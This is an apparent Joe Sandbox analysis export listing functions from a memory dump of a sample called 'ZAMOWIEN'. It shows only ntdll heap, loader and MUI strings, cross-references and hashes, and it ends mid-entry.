Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-1975516107
Opcode ID: 852877e8ca0ad261210395695290c6b05165cb7166eabbf57b510fe9ac3d3e7d
Instruction ID: 2c2ba5842be7caf97db47f8fc21375830a66de9f0d2df26b21dff079263f30f7
Opcode Fuzzy Hash: 852877e8ca0ad261210395695290c6b05165cb7166eabbf57b510fe9ac3d3e7d
Instruction Fuzzy Hash: AD51B179A05349DFEB04CFA8C48479DBBB1BF45718F144959D8146B2C1DBB4A986CF80

Function 3281DB00 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 133timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 3285F611

Strings

HEAP: , xrefs: 3285F647
, passed to %s, xrefs: 3285F662
Invalid heap signature for heap at %p, xrefs: 3285F653
HEAP[%wZ]: , xrefs: 3285F63A
RtlUnlockHeap, xrefs: 3285F65D

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID: DebugPrintTimes
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
API String ID: 3446177414-3224558752
Opcode ID: 7dfd7aa13694dfc0b926854c18b851eda13c763c326060b2e0a8fc9477cf4028
Instruction ID: 853e3371467da7e40404c702bde7ba91ba89c5002eb341d7e8e6f1a72e96ae20
Opcode Fuzzy Hash: 7dfd7aa13694dfc0b926854c18b851eda13c763c326060b2e0a8fc9477cf4028
Instruction Fuzzy Hash: 704137BD501755DFE702CF24C488B9AB7F4FF11368F208569D81A9B6D1CB74A881CB91

Function 3281DBA0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 84timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 3285F757

Strings

HEAP: , xrefs: 3285F78D
, passed to %s, xrefs: 3285F7A8
Invalid heap signature for heap at %p, xrefs: 3285F799
HEAP[%wZ]: , xrefs: 3285F780
RtlLockHeap, xrefs: 3285F7A3

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID: DebugPrintTimes
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
API String ID: 3446177414-1222099010
Opcode ID: 14f905993bc0ea8cf17e9a877fbc0de55b334ab0ea606ee2258f7566a11def92
Instruction ID: 127afc87580bd2438c6662f373017cff50f99ae3a29085e92769edfeecc92789
Opcode Fuzzy Hash: 14f905993bc0ea8cf17e9a877fbc0de55b334ab0ea606ee2258f7566a11def92
Instruction Fuzzy Hash: C731D17D1057D8DFF3128B28C808B8A7BE8FF12754F144495E84A5B791CBB8A881CA61

Function 32889179 Relevance: 10.4, Strings: 8, Instructions: 401COMMON

Download Yara Rule

Strings

\BaseNamedObjects, xrefs: 3288949E
%s\%ld\%s, xrefs: 3288948D
Global\Session\%ld%s, xrefs: 328894C5
%s\%u-%u-%u-%u, xrefs: 32889422
AppContainerNamedObjects, xrefs: 3288946E, 328894D6
BaseNamedObjects, xrefs: 32889477, 3288947C
\Sessions, xrefs: 32889488
\AppContainerNamedObjects, xrefs: 328894AB, 328894B9

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
API String ID: 0-3063724069
Opcode ID: 4385e9417a5891f5ef8bab50df2169cd18c267eb28baa850cefc988d66044b7f
Instruction ID: 80f1cc908ec37a59e110ce7fa7524977450a1d0e9618125d659402fe1a5ca4f8
Opcode Fuzzy Hash: 4385e9417a5891f5ef8bab50df2169cd18c267eb28baa850cefc988d66044b7f
Instruction Fuzzy Hash: 09D128BA805355AFE321CB54C840B9FB7E8AF84754F404929FA94A7350DB70CD4ACBD2

Function 327ED08D Relevance: 10.2, Strings: 8, Instructions: 249COMMON

Download Yara Rule

Strings

\Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 327ED0CF
@, xrefs: 327ED313
Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 327ED146
\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 327ED2C3
@, xrefs: 327ED2AF
@, xrefs: 327ED0FD
Control Panel\Desktop\LanguageConfiguration, xrefs: 327ED196
Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 327ED262

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
API String ID: 0-1356375266
Opcode ID: 5413cf3ff9ab0db316b3ac3ca60cccb0f3dd891a8014b6d5a8accc9ed257aeae
Instruction ID: 595bd0d77bc9050349486ef042a27dcd1a98fa29ffccac5c9d03bc33e2c70b65
Opcode Fuzzy Hash: 5413cf3ff9ab0db316b3ac3ca60cccb0f3dd891a8014b6d5a8accc9ed257aeae
Instruction Fuzzy Hash: 77A14F795083459FE321CF25C450B9FB7E8BF88759F40492EFA999A240DB74D908CFA2

Function 327EF172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON

Download Yara Rule

Strings

(UCRBlock != NULL), xrefs: 3284DF6F
HEAP: , xrefs: 3284DF64, 3284E0A8, 3284E286, 3284E39E
HEAP[%wZ]: , xrefs: 3284DF57, 3284E09B, 3284E279, 3284E391
(LONG)FreeEntry->Size > 1, xrefs: 3284E291
((LONG)FreeEntry->Size > 1), xrefs: 3284E0B3
(!TrailingUCR), xrefs: 3284E3A9

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
API String ID: 0-523794902
Opcode ID: d342b183732a228083370ec9d677d0934d73352ef7d0f7ba731037d886e9928c
Instruction ID: e52468da3af7222fb8792a3459adc54a173811253302fa1e3826a25dc4307aa0
Opcode Fuzzy Hash: d342b183732a228083370ec9d677d0934d73352ef7d0f7ba731037d886e9928c
Instruction Fuzzy Hash: D342F079205785DFE315CF28C884B1BBBE5FF84388F14496DE8969B641DB34E842CB62

Function 3280B1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrutil.c, xrefs: 3285840D, 328584E1
SxS, xrefs: 328583ED
LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx, xrefs: 328584D0
LdrpPreprocessDllName, xrefs: 32858403, 328584D7
DLL %wZ was redirected to %wZ by %s, xrefs: 328583FC
API set, xrefs: 328583F4, 328583F9

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
API String ID: 0-122214566
Opcode ID: 637ad938a29263b75111fdb6ecd844522ac610a7b42390ff824ad1da43e19722
Instruction ID: 02a7532a57d3b5ed346a9bdcb2e1f93cb2c42b55cdc9cc13a70944b740147041
Opcode Fuzzy Hash: 637ad938a29263b75111fdb6ecd844522ac610a7b42390ff824ad1da43e19722
Instruction Fuzzy Hash: 1EC1187DA00359BBEB148B6CCC81BBE77A5AF45318F65C06ADC159B280DF74C984CB91

Function 32800770 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 414COMMON

Download Yara Rule

Strings

(UCRBlock->Size >= *Size), xrefs: 328550CA
HEAP: , xrefs: 328550BD
HEAP[%wZ]: , xrefs: 328550AE

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: 45159af933b8680043484a9154e3d8a017bbeb33e0534b0316015db491b7bc30
Instruction ID: b2718e650294572c04ecafe415b3274052b4ae2c11b462a235a69a5b6892f157
Opcode Fuzzy Hash: 45159af933b8680043484a9154e3d8a017bbeb33e0534b0316015db491b7bc30
Instruction Fuzzy Hash: 50F1A078A01605EFEB15CF68C894B6AB7F5FF45304F2081A9E8199B391DB74E981CF90

Function 3281F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 328602E7
RTL: Re-Waiting, xrefs: 3286031E
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 328602BD

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: fa0efc86598d1852693cc4972e7cd8b935a6bafd27a44afe7dc413bf9acb8439
Instruction ID: 0b63fa57ad25e41b145117737888f195e535358452a529323b25dcbfc303c3e4
Opcode Fuzzy Hash: fa0efc86598d1852693cc4972e7cd8b935a6bafd27a44afe7dc413bf9acb8439
Instruction Fuzzy Hash: D7E1B078608741DFE715CF28C980B2AB7E0BF94358F140A5DF5A98B2E2DB74E945CB42

Function 328151EF Relevance: 6.7, Strings: 5, Instructions: 434COMMON

Download Yara Rule

Strings

Kernel-MUI-Language-Disallowed, xrefs: 32815352
Kernel-MUI-Language-Allowed, xrefs: 3281527B
Kernel-MUI-Number-Allowed, xrefs: 32815247
WindowsExcludedProcs, xrefs: 3281522A
Kernel-MUI-Language-SKU, xrefs: 3281542B

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: da9221b4c9e65f9518045d79b96f701ac528bac1d369a48fb9771f32af369e1b
Instruction ID: 6a73c476cfebc60c0ec14601afd9e35f62cc98706ff6afa35c9286b2d27605b3
Opcode Fuzzy Hash: da9221b4c9e65f9518045d79b96f701ac528bac1d369a48fb9771f32af369e1b
Instruction Fuzzy Hash: DAF17DBAD01219EFDB06CFA8C980ADEBBB8BF08750F51405AE515F7250DB749E01CB90

Function 328CB16B Relevance: 6.4, APIs: 4, Instructions: 450timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 328CB329
RtlDebugPrintTimes.NTDLL ref: 328CB605

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: a0eb24fc69c5cd740ce04f7164a32f3940b0b96735c20750d7c74fb44b6fcc38
Instruction ID: 358afcd021f34495188ed58e8cfe1546663e80dbdb6a58f969fac526d8428857
Opcode Fuzzy Hash: a0eb24fc69c5cd740ce04f7164a32f3940b0b96735c20750d7c74fb44b6fcc38
Instruction Fuzzy Hash: 73F1197AE40A258FDB08CFACC89067DFBF5AF98210B19416DD85ADB384DB74E941CB50

Function 328A11A4 Relevance: 6.4, Strings: 5, Instructions: 113COMMON

Download Yara Rule

Strings

-~2`, xrefs: 328A1270
HEAP: , xrefs: 328A124A, 328A125D, 328A125F, 328A12C4
HEAP[%wZ]: , xrefs: 328A123D, 328A12B7
Heap %p - headers modified (%p is %lx instead of %lx), xrefs: 328A1261
This is located in the %s field of the heap header., xrefs: 328A12D6

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID: This is located in the %s field of the heap header.$ -~2`$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
API String ID: 0-3549987426
Opcode ID: dea4f517cf09fbde8bd141ce163a0684fe01dbecd39ba2ef685672755f60d801
Instruction ID: 8e8843e300b8264e48ed75c7c2776388b7c5659326f6ecea22d9050260ca0f7e
Opcode Fuzzy Hash: dea4f517cf09fbde8bd141ce163a0684fe01dbecd39ba2ef685672755f60d801
Instruction Fuzzy Hash: BF31AA79102224EFE711CBA8C894F567BE8FF05B64F544055F805DB290EF75E940CE65

Function 327E76B2 Relevance: 6.3, Strings: 5, Instructions: 51COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 3284B023
, passed to %s, xrefs: 3284B040
Invalid heap signature for heap at %p, xrefs: 3284B02F
HEAP[%wZ]: , xrefs: 3284B016
RtlFreeHeap, xrefs: 3284B03F

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
API String ID: 0-3061284088
Opcode ID: 71ceb62c9adc2225437c7d5efce1c73b7a9c290739a898d8ddeddd0a4d1108c5
Instruction ID: d92112ac887c78cf0a41d5802944eec9363e54cb01641a0978821d34502685ab
Opcode Fuzzy Hash: 71ceb62c9adc2225437c7d5efce1c73b7a9c290739a898d8ddeddd0a4d1108c5
Instruction Fuzzy Hash: 3A01F77A4162A9DFE21A8728D41DF927FE8FB52770F24409AE0095FA91CFF4AC80C570

Function 328070C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 32807C7C, 3280867F
HEAP[%wZ]: , xrefs: 32807C6D, 32808670
HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 32807C96, 32808696

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-3178619729
Opcode ID: da2006b0e62679fb31dca3d8b873a43506e9a72bc93c46235dae22ab3b67aee7
Instruction ID: e858c53f375e9b43de3fe635ca86795330bb3e4ea17adb242892921cd9eb7e83
Opcode Fuzzy Hash: da2006b0e62679fb31dca3d8b873a43506e9a72bc93c46235dae22ab3b67aee7
Instruction Fuzzy Hash: 8013B178A00759EFEB15CF68C8907A9BBF1BF48304F14C569D859AB381DB74A981CF90

Function 327FB6C0 Relevance: 5.3, Strings: 4, Instructions: 303COMMON

Download Yara Rule

Strings

\U|2, xrefs: 327FB7E4, 327FB7E7
LdrResGetRCConfig Enter, xrefs: 327FB702
LdrResGetRCConfig Exit, xrefs: 327FB714
MUI, xrefs: 327FB6D8

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI$\U|2
API String ID: 0-2651525024
Opcode ID: 7959b696e2e2293e70c5c5cd89f6b9010c964638d051d2a87b0c0c7acd7aa4a4
Instruction ID: b09dc5406e4a1cb974feedd1668694aa222bba91778b7420bd5d20549d16ff36
Opcode Fuzzy Hash: 7959b696e2e2293e70c5c5cd89f6b9010c964638d051d2a87b0c0c7acd7aa4a4
Instruction Fuzzy Hash: 0EB1C179A08705EFDB19CF69C980B9DB7B2BF48798F244429E811EB380DB35E840CB50

Function 327FB440 Relevance: 5.2, Strings: 4, Instructions: 221COMMON

Download Yara Rule

Strings

{, xrefs: 328537B6
LdrpResGetResourceDirectory Exit, xrefs: 327FB477
\U|2, xrefs: 327FB5E0
LdrpResGetResourceDirectory Enter, xrefs: 327FB465

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit$\U|2${
API String ID: 0-541488698
Opcode ID: 4fe5f8e10a5e3dcc064088dd3413f7b71cb86aa4b322eb9772a14be83dbb066a
Instruction ID: e641856dcdbae43b447bcd49d9a33c6d6a655b225a05a5c59276d01b3413cbc4
Opcode Fuzzy Hash: 4fe5f8e10a5e3dcc064088dd3413f7b71cb86aa4b322eb9772a14be83dbb066a
Instruction Fuzzy Hash: 6691CFB9A08319DFEB15CF58C544BAE77B1FF08368F609195E814AF390DB799A40CB90

Function 327EF626 Relevance: 5.2, Strings: 4, Instructions: 188COMMON

Download Yara Rule

Strings

`, xrefs: 3284E428
HEAP: , xrefs: 3284E54E
HEAP[%wZ]: , xrefs: 3284E3FE
ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 3284E563

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
API String ID: 0-2586055223
Opcode ID: e106cf257f9779e02207c3729413b4c99049f1c41eb085a5a69ac688de725158
Instruction ID: 5966d01e5a1484325d5c1ea01bb0782e3fbaac409deb5e02fb98e135c6c12694
Opcode Fuzzy Hash: e106cf257f9779e02207c3729413b4c99049f1c41eb085a5a69ac688de725158
Instruction Fuzzy Hash: FE61217A205784AFE312CB28C844F57B7E8FF84794F044468F9A59B691DF74E901CBA2

Function 327E9148 Relevance: 5.1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 3284BAAD, 3284BAEA
HEAP[%wZ]: , xrefs: 3284BAA0, 3284BADD
VirtualQuery Failed 0x%p %x, xrefs: 3284BAF7
VirtualProtect Failed 0x%p %x, xrefs: 3284BABA

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
API String ID: 0-1391187441
Opcode ID: 983475433560facbfe009f26302cc6840c6555b0efdcfc6ac6d83fcdef2eb803
Instruction ID: b14449d01620b6a2e398597801412642446a46c50cf350cff2a72d683323bf1e
Opcode Fuzzy Hash: 983475433560facbfe009f26302cc6840c6555b0efdcfc6ac6d83fcdef2eb803
Instruction Fuzzy Hash: CA31AF7AA01219EFD702CB59C888F9ABBF9FF45764F104052E815AF291DB70ED40CA60

Function 327F7152 Relevance: 4.7, APIs: 3, Instructions: 158timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 328517D9
RtlDebugPrintTimes.NTDLL ref: 328517EE

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 89cde7088948242e2309c4d2fbbf63e381a5bbe56a6f98180abf8db24ef2d1ec
Instruction ID: aae596fa5e2e2817930210d2f3cd3a7ccbfa93b646f7afd30051c7454ed4e9bd
Opcode Fuzzy Hash: 89cde7088948242e2309c4d2fbbf63e381a5bbe56a6f98180abf8db24ef2d1ec
Instruction Fuzzy Hash: 17510178A04709FFEB09CB68C844BAEB7B1FF44754F204129E815AB394EBB49905CB80

Function 32883A78 Relevance: 4.1, Strings: 3, Instructions: 398COMMON

Download Yara Rule

Strings

PE, xrefs: 32883C42
LdrpResSearchResourceHandle Exit, xrefs: 32883AF1
LdrpResSearchResourceHandle Enter, xrefs: 32883AD6

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
API String ID: 0-1168191160
Opcode ID: 3383d62fb376f89ff85b94a0cc48be9910ba706cb966b03b1c27e78555e389d1
Instruction ID: b481d3cd89c6c3d12a5e6783c287aebe91ec40f4fe00a5e5e05cc24656ebcd74
Opcode Fuzzy Hash: 3383d62fb376f89ff85b94a0cc48be9910ba706cb966b03b1c27e78555e389d1
Instruction Fuzzy Hash: 10F181BAA002288BDB21DF18CC90BD9B7B5FF44744F4480E9EA0CA7241EB759E85CF54

Function 327F1460 Relevance: 4.1, Strings: 3, Instructions: 385COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 327F1596
HEAP[%wZ]: , xrefs: 327F1712
HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 327F1728

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

